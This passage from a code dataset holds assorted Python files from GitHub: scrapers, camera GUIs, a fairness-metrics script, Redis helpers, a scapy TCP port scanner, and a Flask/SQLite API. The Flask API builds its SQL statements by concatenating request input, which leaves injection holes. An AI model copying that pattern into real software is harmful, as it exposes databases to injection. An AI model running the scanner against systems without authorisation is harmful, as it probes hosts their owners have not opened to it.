{'Title':topic_title, 'Description': topic_descp, 'Url': topic_links}\r\nscraped_topics_df = pd.DataFrame(topics_dict)\r\n# print(scraped_df)\r\nscraped_topics_df.to_csv(\"Topics.csv\",index=None)\r\n\r\n\r\n# Scraping the next page\r\nfor j in range(len(topic_title_tags)):\r\n topic_url= topic_links[j]\r\n r1 = requests.get(url = topic_url)\r\n topic_htmlcontent = r1.content\r\n topic_soup = BeautifulSoup(topic_htmlcontent,'html.parser')\r\n\r\n repo_tags = topic_soup.find_all('h3' , {'class' : \"f3 color-fg-muted text-normal lh-condensed\"})\r\n\r\n # scraping different details of this page\r\n # like username, urls, stars etc.\r\n\r\n def repo__details(i):\r\n repo_name_tag = repo_tags[i]\r\n repo_atag = repo_name_tag.find_all('a')\r\n\r\n username = repo_atag[0].get_text().strip()\r\n repo_name = repo_atag[1].get_text().strip()\r\n repo_url = base_link + repo_atag[1]['href']\r\n\r\n star_tags = topic_soup.find_all('span',{'id': 'repo-stars-counter-star'})\r\n repo_stars = star_tags[i].text\r\n\r\n def star_number(stars):\r\n if \"k\" in stars:\r\n return int(float(stars[:-1])*1000)\r\n else:\r\n return stars\r\n\r\n\r\n repo_stars_num = star_number(repo_stars)\r\n return username, repo_name, repo_url, repo_stars_num\r\n\r\n\r\n username_list=[]\r\n reponame_list=[]\r\n repourl_list=[]\r\n repostars_list=[]\r\n for i in range(len(repo_tags)):\r\n \r\n username_list.append(repo__details(i)[0])\r\n reponame_list.append(repo__details(i)[1])\r\n repourl_list.append(repo__details(i)[2])\r\n repostars_list.append(repo__details(i)[3])\r\n\r\n repo_details_dict = {'User Name': username_list, \r\n 'Repository Name': reponame_list,\r\n 'Repository Url' : repourl_list,\r\n 'Stars' : repostars_list}\r\n\r\n Repo_df = pd.DataFrame(repo_details_dict)\r\n\r\n # creating .csv file\r\n Repo_df.to_csv(f'{topic_title[j]}.csv',index = None) \r\n","repo_name":"iyushjha7/Github-web-scraping","sub_path":"Github_scraping.py","file_name":"Github_scraping.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29516556703","text":"from turtle import width\nfrom django.db import models\nfrom PIL import Image\n\n# Create your models here.\nclass Upload(models.Model):\n picture = models.ImageField(null=True,upload_to='media/')\n\n def save(self, *args, **kwargs):\n\n super(Upload, self).save(*args, **kwargs)\n if self.picture: \n print(\"============ image found ===============\")\n im = Image.open(self.picture.path)\n width, height = im.size\n left = 5\n top = height / 4\n right = 164\n bottom = 3 * height / 4\n im1 = im.crop((left,top,right,bottom))\n im1.save(self.picture.path)\n ","repo_name":"AdhilAbbas/Machine-test","sub_path":"testing/app2/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22076498209","text":"import webbrowser\nimport asyncio\nimport aiohttp\nimport bs4\nimport requests\n\n\ndef new_url(url: list) -> str:\n if len(url) > 1:\n for c in range(len(url)-1):\n url[c] = url[c] + '%20'\n\n url = ''.join(url)\n url = 'https://pt.wikipedia.org/wiki/' + url.title()\n\n return url\n\n\nasync def search(url: str):\n return webbrowser.open(url)\n\n\ndef pegar_conteudo(link: str) -> str:\n rq = requests.get(link).text\n soup = bs4.BeautifulSoup(rq, \"html.parser\")\n result = soup.find(\"div\", {\"class\": \"mw-parser-output\"})\n\n texto = bs4.BeautifulSoup(result.decode(), 
\"html.parser\").find_all(\"p\")[0]\n\n return texto.text\n\n\nif __name__ == '__main__':\n url = input('Digite o que você quer pesquisar: ').split()\n\n # t1 = asyncio.run(search(fuc_url))\n result = pegar_conteudo(new_url(url))\n\n print(f'\\nResumo: {result}')\n","repo_name":"davilos/Projetos","sub_path":"pesquisa.py","file_name":"pesquisa.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33145342493","text":"from scapy.all import *\nimport optparse\nimport threading\n\ndef scan(ip,port):\n pkt=IP(dst=ip)/TCP(dport=int(port))\n res=sr1(pkt,timeout=0.1,verbose=0)\n try:\n if int(res[TCP].flags)==18:\n print(port,' is open')\n except:\n pass\n\ndef main():\n parser=optparse.OptionParser('%prog '+\"xxx\")\n parser.add_option('-t',dest='target',type='string',help='Target')\n parser.add_option('-p',dest='port',type='string',help='Port(eg:22,80 1-500)')\n (options,args)=parser.parse_args()\n target=options.target\n if(',' in options.port):\n ports=str(options.port).split(',')\n if ((target==None) or (ports[0]==None)):\n print('Please input target(-t) and port(-p)!')\n exit(0)\n for port in ports:\n t=threading.Thread(target=scan,args=(target,port))\n t.start()\n elif('-' in options.port):\n ports=str(options.port).split('-')\n for port in range(int(ports[0]),int(ports[1])):\n t=threading.Thread(target=scan,args=(target,port))\n t.start()\n\nif __name__=='__main__':\n main()","repo_name":"zmqq/pytools","sub_path":"tcpscan/tcpscan.py","file_name":"tcpscan.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"16647680144","text":"#Matthew Leung\n#March 2022\n\nimport numpy as np\nfrom matrixvision_harvester_class import matrixvision_harvester_class as matrixvision_harvester_class\nfrom pyqtgraph.Qt import QtCore, QtGui\nimport pyqtgraph as pg\nimport pyqtgraph.ptime as ptime\n\n###############################################################################\n\ncti_filename = r\"C:\\Program Files\\MATRIX VISION\\mvIMPACT Acquire\\bin\\x64\\mvGenTLProducer.cti\"\n\ncamera_obj = matrixvision_harvester_class()\ncamera_obj.init_camera(cti_filename)\ncamera_obj.start_camera_acquisition(pixel_format='Mono8')\ncamera_obj.set_min_exposure_time(10)\ncamera_obj.set_exposure(exp_time=10)\ncamera_obj.set_frame_rate(5) #Set to 10 FPS\n\n###############################################################################\n\napp = QtGui.QApplication([])\n\n# Interpret image data as row-major instead of col-major\npg.setConfigOptions(imageAxisOrder='row-major') #VERY IMPORTANT LINE!\n\nview = pg.GraphicsView()\nl = pg.GraphicsLayout(border=(100,100,100))\nview.setCentralItem(l)\nview.show()\nview.setWindowTitle('Far Field Alignment')\n#view.resize(800,600)\nview.showMaximized()\n\n#Title at top\ntext = \"G-CLEF Fiber Lab - Far Field Alignment GUI\"\ntitle_obj = l.addLabel(text, col=0, colspan=3) #title_obj is of type pyqtgraph.graphicsItems.LabelItem.LabelItem\ntitle_obj.setText(text, color=\"#EEEEEE\", size=\"24pt\", bold=True, italic=False)\nl.nextRow()\n\norig_width = camera_obj.WIDTH\norig_height = camera_obj.HEIGHT\n#Add 2 plots into the first row (automatic position)\np1 = l.addPlot(title=\"Original Image\") #Instead of using ViewBox, use plot\np1.setAspectLocked(lock=True, ratio=1) #LOCK ASPECT SO IMAGE IS DISPLAYED PROPERLY\ndata = np.random.normal(size=(orig_width,orig_height))\nimg1 = 
pg.ImageItem(data)\nimg1.setOpts(border={'width':1})\np1.addItem(img1)\n\n# Custom ROI for selecting an image region\nroi = pg.ROI(pos=[int(orig_width/4), int(orig_height/4)], size=[int(orig_width/2), int(orig_height/2)])\nroi.addScaleHandle([0.5, 1], [0.5, 0.5])\nroi.addScaleHandle([0, 0.5], [0.5, 0.5])\np1.addItem(roi)\nroi.setZValue(10) # make sure ROI is drawn above image\n\np2 = l.addPlot(title=\"Cropped Image\")\np2.setAspectLocked(lock=True, ratio=1) #LOCK ASPECT SO IMAGE IS DISPLAYED PROPERLY\ncropped_data = roi.getArrayRegion(data, img1)\nimg2 = pg.ImageItem(cropped_data)\nimg2.setOpts(border={'width':1})\np2.addItem(img2)\n\n\np3 = l.addPlot() #p3 is of type pyqtgraph.graphicsItems.PlotItem.PlotItem.PlotItem\n#Change tick font size\n#https://stackoverflow.com/questions/41723497/how-to-change-ticks-fontsize-of-a-plot-using-pyqtgraph\nfont=QtGui.QFont()\nfont.setPixelSize(20)\np3.getAxis(\"bottom\").setStyle(tickFont = font)\np3.getAxis(\"bottom\").setStyle(tickTextOffset = 20)\np3.getAxis(\"left\").setStyle(tickFont = font)\np3.getAxis(\"left\").setStyle(tickTextOffset = 20)\n\n#Change label font size and color\n#https://stackoverflow.com/a/56904913\nlabel_style = {\"color\": \"#EEEEEE\", \"font-size\": \"16pt\"}\np3.setTitle(\"Far Field Beam Eccentricity VS Time\", color=\"#EEEEEE\", size=\"18pt\")\np3.setLabel(\"bottom\", \"Time\", **label_style)\np3.setLabel(\"left\", \"Eccentricity\", **label_style)\n\np3.showGrid(x = True, y = True, alpha = 0.5) #add grid\n\nproxy = QtGui.QGraphicsProxyWidget()\ncb = QtGui.QCheckBox('Crop and Fit')\nproxy.setWidget(cb)\nl.nextRow()\nl2 = l.addLayout(rowspan=3)\nl2.addItem(proxy,row=0,col=0)\n\n###############################################################################\n\ndata1 = np.random.normal(size=300)\npen2 = pg.mkPen(color=\"#FF0000\")\ncurve2 = p3.plot(data1, pen=pen2)\nptr1 = 0\ndef update1():\n global data1, ptr1\n data1[:-1] = data1[1:] # shift data in the array one sample left\n # (see also: np.roll)\n data1[-1] = np.random.normal()\n \n ptr1 += 1\n curve2.setData(data1)\n curve2.setPos(ptr1, 0)\n\n###############################################################################\n\nupdateTime = ptime.time()\nfps = 0\n\ndef imageHoverEvent(event):\n \"\"\"Show the position, pixel, and value under the mouse cursor.\n \"\"\"\n global img2, cropped_data\n if event.isExit():\n p2.setTitle(\"\")\n return\n pos = event.pos()\n i, j = pos.y(), pos.x()\n i = int(np.clip(i, 0, cropped_data.shape[0] - 1))\n j = int(np.clip(j, 0, cropped_data.shape[1] - 1))\n val = cropped_data[i, j]\n ppos = img2.mapToParent(pos)\n x, y = ppos.x(), ppos.y()\n p2.setTitle(\"pos: (%0.1f, %0.1f) pixel: (%d, %d) value: %g\" % (x, y, i, j, val))\n\n# Monkey-patch the image to use our custom hover function. \n# This is generally discouraged (you should subclass ImageItem instead),\n# but it works for a very simple use like this. 
\nimg2.hoverEvent = imageHoverEvent\n\n\n\ndef updateData():\n global img1, updateTime, fps, data, cropped_data\n\n data = camera_obj.get_snapshot_np_array()\n #data = data.transpose(1, 0, 2)\n #data = np.flip(data, 1)\n data = data[:,:,0]\n camera_obj.buffer.queue()\n del camera_obj.buffer\n\n ## Display the data\n img1.setImage(data)\n update1()\n\n cropped_data = roi.getArrayRegion(data, img1)\n img2.setImage(cropped_data)\n\n QtCore.QTimer.singleShot(1, updateData)\n now = ptime.time()\n fps2 = 1.0 / (now-updateTime)\n updateTime = now\n fps = fps * 0.9 + fps2 * 0.1\n \nupdateData()\n\n\nif __name__ == '__main__':\n \n #Start Qt event loop unless running in interactive mode\n import sys\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n camera_obj.done_camera()\n print(\"Done!\")","repo_name":"mattleung10/G-CLEF_Fiber_Lab","sub_path":"Matrix_Vision_Interface/Using_Harvester/pyqtgraph_test/pyqtgraph_video_test_ROI.py","file_name":"pyqtgraph_video_test_ROI.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20460160654","text":"from flask import Flask,jsonify,request\nimport sqlite3,json\n\napp = Flask(__name__)\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type, authorization' )\n response.headers.add('Access-Control-Allow-Methods', 'GET, POST, OPTIONS, PUT, DELETE')\n return response\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n######## Category #########\n@app.route('/category',methods = ['GET'])\ndef category():\n try:\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"select * from category\")\n rows = cur.fetchall()\n cur.close()\n\n return jsonify(rows)\n except:\n jsonify({'status': 400,'message': 'Failed to read data from category table'}),400\n\n\n@app.route('/category',methods = ['POST'])\ndef insertcategory():\n try:\n _json = request.json\n _category_name = _json['category_name']\n\n with sqlite3.connect(\"products.db\") as con:\n cur = con.cursor()\n cur.execute(\"INSERT INTO category(category_name) VALUES ('\"+_category_name+\"')\")\n con.commit()\n cur.close()\n\n return jsonify({'status': 200,'message': 'Insert Successfull'}),200\n\n except:\n jsonify({'status': 400,'message': 'Failed to insert data into from product table'}),400\n\n@app.route('/category',methods = ['PUT'])\ndef updatecategory():\n try:\n _json = request.json\n _id = _json['id']\n _category_name = _json['category_name']\n print(_id,_category_name)\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"Update category set category_name = '\"+_category_name+\"' where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 201,'message': 'Update Successfull'}),201\n\n except:\n jsonify({'status': 400,'message': 'Failed to update from product table'}),400\n\n@app.route('/category',methods = ['DELETE'])\ndef deletecategory():\n try:\n _json = request.json\n _id = _json['id']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"DELETE from category where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 202,'message': 
'Delete Successfull'}),202\n\n except:\n jsonify({'status': 400,'message': 'Failed to delete record from product table'}),400\n\n\n########## Product ###########\n@app.route('/product',methods = ['GET'])\ndef product():\n try:\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"select p.id,p.product_name,c.category_name from products p INNER JOIN category c ON p.category=c.id;\")\n rows = cur.fetchall()\n cur.close()\n\n return jsonify(rows)\n\n except:\n jsonify({'status': 400,'message': 'Failed to read data from product table'}),400\n\n\n@app.route('/product',methods = ['POST'])\ndef insertproduct():\n try:\n _json = request.json\n _product_name = _json['product_name']\n _category = _json['category']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"INSERT INTO products(product_name, category) VALUES ('\"+_product_name+\"',\"+_category+\")\")\n conn.commit()\n cur.close()\n\n return jsonify({'status': 200,'message': 'Insert Successfull'}),200\n\n except:\n jsonify({'status': 400,'message': 'Failed to insert data into from product table'}),400\n\n@app.route('/product',methods = ['PUT'])\ndef updateproduct():\n try:\n _json = request.json\n _id = _json['id']\n _product_name = _json['product_name']\n _category = _json['category']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"Update products set product_name = '\"+_product_name+\"', category = \"+_category+\" where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 201,'message': 'Update Successfull'}),201\n\n except:\n jsonify({'status': 400,'message': 'Failed to update from product table'}),400\n\n@app.route('/product',methods = ['DELETE'])\ndef deleteproduct():\n try:\n _json = request.json\n _id = _json['id']\n\n conn = sqlite3.connect('products.db')\n conn.row_factory = dict_factory\n cur = conn.cursor()\n cur.execute(\"DELETE from products where id = \"+_id)\n conn.commit()\n cur.close()\n\n return jsonify({'status': 202,'message': 'Delete Successfull'}),202\n\n except:\n jsonify({'status': 400,'message': 'Failed to delete record from product table'}),400\n\n\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n resp = jsonify(message)\n resp.status_code = 404\n\n return resp\n\nif __name__ == '__main__':\n app.config['JSON_AS_ASCII'] = False\n app.run(debug=True)","repo_name":"sirexcuseme/api-example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21103336968","text":"# tut01 solution\n# import pandas as pd and csv module\nimport csv\nimport pandas as pd\n# read the input file\nwith open('octant_input.csv','r') as input_file:\n reader=csv.reader(input_file)\n# write in output file\n with open('f.csv','w',newline='') as output_file:\n writer=csv.writer(output_file)\n for row in reader:\n writer.writerow(row)\ndata=pd.read_csv('f.csv')\n# taking average using predefine mean method\nu_avg=data['U'].mean()\nv_avg=data['V'].mean()\nw_avg=data['W'].mean()\n# write average on output file\ndata.at[0,'U_avg']=u_avg\ndata.at[0,'V_avg']=v_avg\ndata.at[0,'W_avg']=w_avg\nrow_no=0\n# initializing different octant \n# p1 ->positive 1 \n# n1 ->negative 
1\ncount_p1=0\ncount_n1=0\ncount_p2=0\ncount_n2=0\ncount_p3=0\ncount_n3=0\ncount_p4=0\ncount_n4=0\n\n# making fluctuation columns (deviation from the average)\nfor ele in data['V']:\n    x=data.at[row_no,\"U'=U-Uavg\"]=data.at[row_no,'U']-u_avg\n    y=data.at[row_no,\"V'=V-Vavg\"]=data.at[row_no,'V']-v_avg\n    z=data.at[row_no,\"W'=W-Wavg\"]=data.at[row_no,'W']-w_avg\n    if x>0:\n        if y>0:\n            if z>0:\n                data.at[row_no,'Octant']=1\n                count_p1=count_p1+1\n            else:\n                data.at[row_no,'Octant']=-1\n                count_n1=count_n1+1\n        else:\n            if z>0:\n                data.at[row_no,'Octant']=4\n                count_p4=count_p4+1\n            else:\n                data.at[row_no,'Octant']=-4\n                count_n4=count_n4+1\n    else:\n        if y>0:\n            if z>0:\n                data.at[row_no,'Octant']=2\n                count_p2=count_p2+1\n            else:\n                data.at[row_no,'Octant']=-2\n                count_n2=count_n2+1\n        else:\n            if z>0:\n                data.at[row_no,'Octant']=3\n                count_p3=count_p3+1\n            else:\n                data.at[row_no,'Octant']=-3\n                count_n3=count_n3+1\n    row_no=row_no+1\n\n# overall count of each octant\ndata.at[0,'Octant ID']='Overall Count'\ndata.at[0,'1']=count_p1\ndata.at[0,'-1']=count_n1\ndata.at[0,'2']=count_p2\ndata.at[0,'-2']=count_n2\ndata.at[0,'3']=count_p3\ndata.at[0,'-3']=count_n3\ndata.at[0,'4']=count_p4\ndata.at[0,'-4']=count_n4\n\n# now for different mod range values\ncount_p1=0\ncount_n1=0\ncount_p2=0\ncount_n2=0\ncount_p3=0\ncount_n3=0\ncount_p4=0\ncount_n4=0\nlength=row_no\nmod=5000\nj=1\ncurr_p1=1\ncurr_p2=1\ncurr_p3=1\ncurr_p4=1\ncurr_n1=1\ncurr_n2=1\ncurr_n3=1\ncurr_n4=1\ncurr_oct=1\ncnt=0\n\nfor i in range(length):\n    x=data.at[i,'Octant']\n    if(x==1): count_p1+=1\n    elif(x==2): count_p2+=1\n    elif(x==3): count_p3+=1\n    elif(x==4): count_p4+=1\n    elif(x==-1): count_n1+=1\n    elif(x==-2): count_n2+=1\n    elif(x==-3): count_n3+=1\n    elif(x==-4): count_n4+=1\n    cnt+=1\n    if(cnt==mod or i==length-1):\n        cnt=0\n        data.at[curr_p1,'1']=count_p1\n        data.at[curr_p2,'2']=count_p2\n        data.at[curr_p3,'3']=count_p3\n        data.at[curr_p4,'4']=count_p4\n        data.at[curr_n1,'-1']=count_n1\n        data.at[curr_n2,'-2']=count_n2\n        data.at[curr_n3,'-3']=count_n3\n        data.at[curr_n4,'-4']=count_n4\n        if(j==6):\n            data.at[curr_oct,'Octant ID']=\"25001-30000\"\n        elif(i==4999):\n            str1=\"{} - {}\".format(i-mod+1, i+1)\n            data.at[curr_oct,'Octant ID']=str1\n        else:\n            str1=\"{} - {}\".format(i-mod+2, i+1)\n            data.at[curr_oct,'Octant ID']=str1\n        curr_p1+=1\n        curr_p2+=1\n        curr_p3+=1\n        curr_p4+=1\n        curr_n1+=1\n        curr_n2+=1\n        curr_n3+=1\n        curr_n4+=1\n        curr_oct+=1\n\n        count_p1=0\n        count_n1=0\n        count_p2=0\n        count_n2=0\n        count_p3=0\n        count_n3=0\n        count_p4=0\n        count_n4=0\n        j+=1\n\ndata.to_csv('f.csv',index=False)","repo_name":"ChetanChaudhary6/2001ME16_2022","sub_path":"tut01/tut01.py","file_name":"tut01.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"39279481449","text":"from typing import Dict, NoReturn, List\nfrom aioredis import Redis\n\n\nasync def assign(redis: Redis, user: int, name: str, value: str) -> NoReturn:\n    tr = redis.pipeline()\n    tr.hset(f\"aliases-{user}\", name, value)\n    tr.sadd(\"aliases\", user)\n    await tr.execute()\n\n\nasync def fetch(redis: Redis, user: int, names: str) -> str:\n    return await redis.hget(f\"aliases-{user}\", names)\n\n\nasync def fetch_multi(redis: Redis, user: int, names: List[str]) -> str:\n    return await redis.hmget(f\"aliases-{user}\", *names)\n\n\nasync def list(redis: Redis, user: int) -> Dict[str, str]:\n    return await redis.hgetall(f\"aliases-{user}\")\n\n\nasync def delete(redis: Redis, user: int, name: str) -> NoReturn:\n    tr = redis.pipeline()\n    tr.hdel(f\"aliases-{user}\", name)\n    
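# hlen is queued on the same pipeline, so its result is a future that only\n    # resolves after execute(); that is why it is awaited separately below\n    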
alias_count = tr.hlen(f\"aliases-{user}\")\n await tr.execute()\n alias_count = await alias_count\n if alias_count == 0:\n await redis.srem(\"aliases\", user)\n\n\nasync def count(redis: Redis, user: int) -> int:\n return await redis.hlen(f\"aliases-{user}\")\n","repo_name":"NQN-Discord/redis_helper","sub_path":"redis_helper/emote_transform/alias.py","file_name":"alias.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"32758060498","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport sys\nsys.path.append('../../../')\nfrom utils.packages import *\nfrom utils.ml_fairness import *\nfrom utils.standard_data import *\ndir = 'res/titanic5-'\nd_fields = ['Pipeline', 'Stage', 'SF_SPD', 'SF_EOD', 'SF_AOD', 'SD_ERD', 'Acc', 'F1']\ndiff_file = dir + 'fairness' + '.csv'\nif(not os.path.isfile(diff_file)):\n with open(diff_file, 'a') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(d_fields)\n\n\n# In[2]:\n\n\n# Load data\ntrain = pd.read_csv('../../../data/titanic/train.csv')\ntest = pd.read_csv('../../../data/titanic/test.csv')\ndf = train\n\n\n# In[3]:\n\n\n## BASIC PREP\ndf['Sex'] = df['Sex'].replace({'female': 0.0, 'male': 1.0})\n\ny1_df = df.copy()\n## Custom feature\ndf[\"Age\"] = df[\"Age\"].fillna(-0.5)\nbins = [-1, 0, 5, 12, 18, 24, 35, 60, np.inf]\nlabels = ['Unknown', 'Baby', 'Child', 'Teenager', 'Student', 'Young Adult', 'Adult', 'Senior']\ndf['AgeGroup'] = pd.cut(df[\"Age\"], bins, labels = labels)\n\ndf[\"CabinBool\"] = (df[\"Cabin\"].notnull().astype('int'))\n\ndf['Title'] = df.Name.str.extract(' ([A-Za-z]+)\\.', expand=False)\ndf['Title'] = df['Title'].replace(['Lady', 'Capt', 'Col',\n 'Don', 'Dr', 'Major', 'Rev', 'Jonkheer', 'Dona'], 'Rare')\n \ndf['Title'] = df['Title'].replace(['Countess', 'Lady', 'Sir'], 'Royal')\ndf['Title'] = df['Title'].replace('Mlle', 'Miss')\ndf['Title'] = df['Title'].replace('Ms', 'Miss')\ndf['Title'] = df['Title'].replace('Mme', 'Mrs')\ntitle_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Royal\": 5, \"Rare\": 6}\ndf['Title'] = df['Title'].map(title_mapping)\ndf['Title'] = df['Title'].fillna(0)\n\nage_title_mapping = {1: \"Young Adult\", 2: \"Student\", 3: \"Adult\", 4: \"Baby\", 5: \"Adult\", 6: \"Adult\"}\nfor x in range(len(train[\"AgeGroup\"])):\n if df[\"AgeGroup\"][x] == \"Unknown\":\n df[\"AgeGroup\"][x] = age_title_mapping[train[\"Title\"][x]]\n\nage_mapping = {'Baby': 1, 'Child': 2, 'Teenager': 3, 'Student': 4, 'Young Adult': 5, 'Adult': 6, 'Senior': 7}\ndf['AgeGroup'] = df['AgeGroup'].map(age_mapping)\n\ndf = df.fillna({\"Embarked\": \"S\"})\nembarked_mapping = {\"S\": 1, \"C\": 2, \"Q\": 3}\ndf['Embarked'] = df['Embarked'].map(embarked_mapping)\ndf['FareBand'] = pd.qcut(df['Fare'], 4, labels = [1, 2, 3, 4])\n\n\ndf = df.drop(['Fare'], axis = 1)\ndf = df.drop(['Cabin'], axis = 1)\ndf = df.drop(['Ticket'], axis = 1)\ndf = df.drop(['PassengerId'], axis = 1)\ndf = df.drop(['Name'], axis = 1)\n\n\ny1_df['Age'].fillna(y1_df['Age'].median(), inplace = True)\ny1_df = y1_df.fillna({\"Embarked\": \"S\"})\ny1_df['Embarked'] = y1_df['Embarked'].map(embarked_mapping)\ny1_df['Cabin'].fillna(y1_df['Cabin'].mode(), inplace = True)\n\n# One-hot encoder\ncat_feat = ['Cabin', 'Ticket', 'Embarked']\ny1_df = pd.get_dummies(y1_df, columns=cat_feat, prefix_sep='=')\n\n\ny1_df = y1_df.drop(['PassengerId'], axis = 1)\ny1_df = y1_df.drop(['Name'], axis = 1)\n\n\n# In[4]:\n\n\n\nseed = randrange(100)\ny2_train, y2_test 
= train_test_split(df, test_size = 0.3, random_state = seed) # stratify=df['loan']\ny1_train, y1_test = train_test_split(y1_df, test_size = 0.3, random_state = seed) # \n\npro_att_name = ['Sex']\npriv_class = [1]\nreamining_cat_feat = []\n\ny2_data_orig_train, y2_X_train, y2_y_train = load_titanic_data(y2_train, pro_att_name, priv_class, reamining_cat_feat)\ny2_data_orig_test, y2_X_test, y2_y_test = load_titanic_data(y2_test, pro_att_name, priv_class, reamining_cat_feat)\n\ny1_data_orig_train, y1_X_train, y1_y_train = load_titanic_data(y1_train, pro_att_name, priv_class, reamining_cat_feat)\ny1_data_orig_test, y1_X_test, y1_y_test = load_titanic_data(y1_test, pro_att_name, priv_class, reamining_cat_feat)\n\n\n\n\nfrom sklearn.ensemble import GradientBoostingClassifier\ny2_model = GradientBoostingClassifier()\ny2_mdl = y2_model.fit(y2_X_train,y2_y_train) \n\ny1_model = GradientBoostingClassifier()\ny1_mdl = y1_model.fit(y1_X_train,y1_y_train) \n\n\n# plot_model_performance(y2_mdl, y2_X_test, y2_y_test)\ny1_pred, y1_fair = get_fair_metrics_and_plot('filename', y1_data_orig_test, y1_mdl)\ny2_pred, y2_fair = get_fair_metrics_and_plot('filename', y2_data_orig_test, y2_mdl)\n\n\n\ny1_fair = y1_fair.drop(['DI', 'CNT', 'TI'], axis=1)\ny2_fair = y2_fair.drop(['DI', 'CNT', 'TI'], axis=1)\nCVR, CVD, AVR_EOD, AVD_EOD, AVR_SPD, AVD_SPD, AVD_AOD, AV_ERD = compute_new_metrics(y2_data_orig_test, y1_pred, y2_pred)\nrow_y1 = y1_fair.iloc[[0]].values[0].tolist()\nrow_y2 = y2_fair.iloc[[0]].values[0].tolist()\ndiff = []\n\n# diff.append(CVR)\n# diff.append(CVD)\ndiff.append(AVD_SPD)\ndiff.append(AVD_EOD)\ndiff.append(AVD_AOD)\ndiff.append(AV_ERD)\n\nfor i in range(len(row_y2)):\n if(i < 2):\n change = row_y2[i] - row_y1[i]\n else:\n break;\n diff.append(change)\n\nstage = 'Custom(feature)'\nmodel_name = 'titanic5'\n# diff = diff_df.iloc[0].values.tolist()\ndiff.insert(0, stage)\ndiff.insert(0, model_name)\n\ncols = ['Pipeline', 'Stage', 'SF_SPD', 'SF_EOD', 'SF_AOD', 'SD_ERD', 'Acc', 'F1']\n# metrics = pd.DataFrame(data=obj_fairness, index=['y1'], columns=cols)\ndiff_df = pd.DataFrame(data=[diff], columns = cols, index = ['Diff']).round(3)\n\nwith open(diff_file, 'a') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow(diff)\n\n","repo_name":"sumonbis/FairPreprocessing","sub_path":"src/fair-preprocessing/titanic/TT5.py","file_name":"TT5.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"7"} +{"seq_id":"71660874782","text":"from os import path\nimport random\nimport os\nfrom . 
import myhash\npth = path.join(path.expanduser(\"~\"), \"meowMemo\")\n\n\ndef ensure_dir(pth):\n    if(not path.exists(path.dirname(pth))):\n        os.makedirs(path.dirname(pth))\n\n\ndef get_temp_file(ext='.in'):\n    filename = myhash.base32(random.randrange(1 << 40), length=8)\n    return path.join(pth, 'temp', filename+ext)\n\n\nif(__name__ == '__main__'): # unit test\n    print(get_temp_file())\n\n    print(get_temp_file())\n","repo_name":"TkskKurumi/meow-memo","sub_path":"memo/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"23768734171","text":"from PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nimport sys\nimport cv2\nfrom PyQt5.uic import loadUiType\nimport urllib.request \nimport os\nfrom os import path\n\n\nui,_ = loadUiType(path.join(path.dirname(__file__),'main.ui'))\n\n\nclass MainApp(QMainWindow , ui):\n    def __init__(self , parent=None):\n        super(MainApp , self).__init__(parent)\n        QMainWindow.__init__(self)\n        self.setupUi(self)\n        self.Handel_buttons()\n        #self.cam=cv2.VideoCapture(0)\n        self.img_counter=0\n        \n        \n    def Handel_buttons(self):\n        self.pushButton.clicked.connect(self.open_camera)\n        self.pushButton_2.clicked.connect(self.close_camera)\n        self.pushButton_3.clicked.connect(self.take_pic)\n    def open_camera(self):\n        self.cam=cv2.VideoCapture(0)\n        cv2.namedWindow('Kamera')\n        while True:\n            ret, self.frame=self.cam.read()\n            cv2.imshow('Kamera',self.frame)\n            if cv2.waitKey(1) & 0xFF == ord('q'):\n                break\n        